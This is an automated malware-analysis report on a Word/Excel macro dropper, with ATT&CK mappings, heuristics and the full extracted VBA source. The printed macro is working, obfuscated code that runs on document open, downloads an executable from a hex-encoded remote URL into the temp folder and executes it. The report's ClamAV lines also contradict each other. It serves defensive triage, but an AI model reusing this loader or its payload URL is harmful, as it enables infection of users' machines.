Verdict: MALICIOUS
Risk Score: 324
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains obfuscated VBA macros, including an AutoOpen macro, which is a common technique for executing malicious code upon opening a document. The script utilizes CreateObject to instantiate an object for web requests and appears to download a second-stage payload from a URL constructed via HexToString. The presence of ShellExecute API calls further indicates execution of external code.
Heuristics (11)
- ClamAV: Doc.Dropper.Agent-1616700 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-1616700
- VBA macros detected (medium, OLE_VBA_MACROS, 6 related findings): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script: Set AUjVIjFE = CreateObject(HexToString("4D53584D4C322E584D4C48545450"))
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
  Matched line in script: Set AUjVIjFE = CreateObject(HexToString("4D53584D4C322E584D4C48545450"))
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro
  Matched line in script: Sub AutoOpen()
- Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro
  Matched line in script: Sub Workbook_Open()
- Environ() call, env variable access (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
  Matched line in script: NgRVvV.ShellExecute Environ(HexToString("54454D50")) & HexToString("5C3332343233343233342E657865")
- Reference to ShellExecute API (high, SC_STR_SHELLEXEC): Reference to ShellExecute API
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (medium, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6280 bytes |

SHA-256: 49adad1fc33c1631d0fb4ffc3b21f27b15677f0623765b95f200a2a78cef8942

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 54 of 106 identifiers look randomly generated (e.g. 'HrZcwZdroQkJJ'), consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub uiwefds()
Dim oYoglGYg As Integer
For oYoglGYg = 0 To 7
Dim PwYchYpl As Integer
For PwYchYpl = 0 To 3
DoEvents
Next PwYchYpl
DoEvents
Next oYoglGYg
Dim NDClCYxB As Integer
For NDClCYxB = 0 To 5
DoEvents
Next NDClCYxB
GHJksdfsd
End Sub
Sub AutoOpen()
Dim BUJpNGVs As Integer
For BUJpNGVs = 0 To 2
Dim ojePHgOn As Integer
For ojePHgOn = 0 To 4
DoEvents
Next ojePHgOn
DoEvents
Next BUJpNGVs
Dim arGnmRUr As Integer
For arGnmRUr = 0 To 2
DoEvents
Next arGnmRUr
uiwefds
End Sub
Sub Workbook_Open()
Dim tIQONlRl As Integer
For tIQONlRl = 0 To 9
Dim DlcKhaLG As Integer
For DlcKhaLG = 0 To 6
DoEvents
Next DlcKhaLG
DoEvents
Next tIQONlRl
Dim Dqjehtla As Integer
For Dqjehtla = 0 To 3
DoEvents
Next Dqjehtla
uiwefds
End Sub
Function SaveWebFile(ByVal vWebFile As String, ByVal fgHBjsdfsdf As String) As Boolean
Dim AUjVIjFE As Object, i As Long, vFF As Long, oResp() As Byte
Dim MKwDfrWa As Integer
For MKwDfrWa = 0 To 7
Dim AnEJnNux As Integer
For AnEJnNux = 0 To 4
DoEvents
Next AnEJnNux
DoEvents
Next MKwDfrWa
Dim VXgWAtjh As Integer
For VXgWAtjh = 0 To 8
DoEvents
Next VXgWAtjh
Dim nWmhpOLJ As Integer
For nWmhpOLJ = 0 To 3
Dim TOBHJjkq As Integer
For TOBHJjkq = 0 To 4
DoEvents
Next TOBHJjkq
DoEvents
Next nWmhpOLJ
Dim xfCKaGSU As Integer
For xfCKaGSU = 0 To 3
DoEvents
Next xfCKaGSU
Set AUjVIjFE = CreateObject(HexToString("4D53584D4C322E584D4C48545450"))
AUjVIjFE.Open HexToString("474554"), vWebFile, False
Dim cuEdWJEi As Integer
For cuEdWJEi = 0 To 3
Dim hcMcVDAy As Integer
For hcMcVDAy = 0 To 8
DoEvents
Next hcMcVDAy
DoEvents
Next cuEdWJEi
Dim kNlYlYYP As Integer
For kNlYlYYP = 0 To 2
DoEvents
Next kNlYlYYP
AUjVIjFE.Send
Dim gLIiHklS As Integer
For gLIiHklS = 0 To 7
Dim UHLxoTnO As Integer
For UHLxoTnO = 0 To 8
DoEvents
Next UHLxoTnO
DoEvents
Next gLIiHklS
Dim lOpUCeCz As Integer
For lOpUCeCz = 0 To 5
DoEvents
Next lOpUCeCz
Dim vigWOhDJ As Integer
For vigWOhDJ = 0 To 1
Dim gSEWVnBT As Integer
For gSEWVnBT = 0 To 1
DoEvents
Next gSEWVnBT
DoEvents
Next vigWOhDJ
Dim WHvOpdZY As Integer
For WHvOpdZY = 0 To 7
DoEvents
Next WHvOpdZY
oResp = AUjVIjFE.responseBody
Dim CqPSLUWL As Integer
For CqPSLUWL = 0 To 2
Dim tzgGgSOk As Integer
For tzgGgSOk = 0 To 3
DoEvents
Next tzgGgSOk
DoEvents
Next CqPSLUWL
Dim DIQRntnq As Integer
For DIQRntnq = 0 To 9
DoEvents
Next DIQRntnq
Dim mvaENwsz As Integer
For mvaENwsz = 0 To 9
Dim ZJEzoywE As Integer
For ZJEzoywE = 0 To 4
DoEvents
Next ZJEzoywE
DoEvents
Next mvaENwsz
Dim iaNOZsvg As Integer
For iaNOZsvg = 0 To 9
DoEvents
Next iaNOZsvg
vFF = FreeFile
Open fgHBjsdfsdf For Binary Access Write As #vFF
Dim DNRdFOSY As Integer
For DNRdFOSY = 0 To 6
Dim lHduYTlx As Integer
For lHduYTlx = 0 To 2
DoEvents
Next lHduYTlx
DoEvents
Next DNRdFOSY
Dim xaxyXJkE As Integer
For xaxyXJkE = 0 To 3
DoEvents
Next xaxyXJkE
Put #vFF, , oResp
Dim bbpmZDkm As Integer
For bbpmZDkm = 0 To 7
Dim xPdrKQOZ As Integer
For xPdrKQOZ = 0 To 6
DoEvents
Next xPdrKQOZ
DoEvents
Next bbpmZDkm
Dim ASdHxvKS As Integer
For ASdHxvKS = 0 To 7
DoEvents
Next ASdHxvKS
Close #vFF
Dim uhhgqFpN As Integer
For uhhgqFpN = 0 To 3
Dim FbRVvahd As Integer
For FbRVvahd = 0 To 9
DoEvents
Next FbRVvahd
DoEvents
Next uhhgqFpN
Dim kbcDCzXs As Integer
For kbcDCzXs = 0 To 5
DoEvents
Next kbcDCzXs
Set AUjVIjFE = Nothing
Dim NgRVvV As Object
Dim oLSYueam As Integer
For oLSYueam = 0 To 4
Dim wEjGWMqW As Integer
For wEjGWMqW = 0 To 8
DoEvents
Next wEjGWMqW
DoEvents
Next oLSYueam
Dim uHhPIfye As Integer
For uHhPIfye = 0 To 6
DoEvents
Next uHhPIfye
Set NgRVvV = CreateObject(HexToString("5368656C6C2E6170706C69636174696F6E"))
Dim oSEXVckr As Integer
For oSEXVckr = 0 To 9
Dim TuqwgeFr As Integer
For TuqwgeFr = 0 To 2
DoEvents
Next TuqwgeFr
DoEvents
Next oSEXVckr
Dim bSTYjBaq As Integer
For bSTYjBaq = 0 To 3
DoEvents
Next bSTYjBaq
NgRVvV.ShellExecute Environ(HexToString("54454D50")) & HexToString("5C3332343233343233342E657865")
End Function
Sub GHJksdfsd()
Dim TTlulrHb As Integer
For TTlulrHb = 0 To 4
Dim nzPhlZuA As Integer
For nzPhlZuA = 0 To 3
DoEvents
Next nzPhlZuA
DoEvents
Next TTlulrHb
Dim pKYcyISK As Integer
For pKYcyISK = 0 To 1
DoEvents
Next pKYcyISK
SaveWebFile HexToString("687474703A2F2F746563686E6F2D6B61722E72752F6A732F62696E2E657865"), Environ(HexToString("54454D50")) & HexToString("5C3332343233343233342E657865")
End Sub
Public Function HexToString(ByVal strData As String) As String
Dim HrZcwZdroQkJJ As String
Dim jmyReLXI As Integer
For jmyReLXI = 0 To 2
Dim UcaPijwK As Integer
For UcaPijwK = 0 To 5
DoEvents
Next UcaPijwK
DoEvents
Next jmyReLXI
Dim pllpewTD As Integer
For pllpewTD = 0 To 1
DoEvents
Next pllpewTD
Do Until Len(strData) < 2
Dim TAGfGllS As Integer
For TAGfGllS = 0 To 8
Dim OKpypckB As Integer
For OKpypckB = 0 To 2
DoEvents
Next OKpypckB
DoEvents
Next TAGfGllS
Dim lVsQygKc As Integer
For lVsQygKc = 0 To 8
DoEvents
Next lVsQygKc
HrZcwZdroQkJJ = HrZcwZdroQkJJ + Chr$(CLng("&H" + Left$(strData, 2)))
Dim DjKVyyaC As Integer
For DjKVyyaC = 0 To 6
Dim Drofnybo As Integer
For Drofnybo = 0 To 3
DoEvents
Next Drofnybo
DoEvents
Next DjKVyyaC
Dim ShVjCMDA As Integer
For ShVjCMDA = 0 To 3
DoEvents
Next ShVjCMDA
strData = Right$(strData, Len(strData) - 2)
Dim ISBftRjL As Integer
For ISBftRjL = 0 To 8
Dim cluMyKYJ As Integer
For cluMyKYJ = 0 To 3
DoEvents
Next cluMyKYJ
DoEvents
Next ISBftRjL
Dim fUrZEoEs As Integer
For fUrZEoEs = 0 To 5
DoEvents
Next fUrZEoEs
Loop
Dim zylYcfyu As Integer
For zylYcfyu = 0 To 8
Dim JkXjjQxz As Integer
For JkXjjQxz = 0 To 6
DoEvents
Next JkXjjQxz
DoEvents
Next zylYcfyu
Dim vIqIGDXI As Integer
For vIqIGDXI = 0 To 3
DoEvents
Next vIqIGDXI
HexToString = HrZcwZdroQkJJ
End Function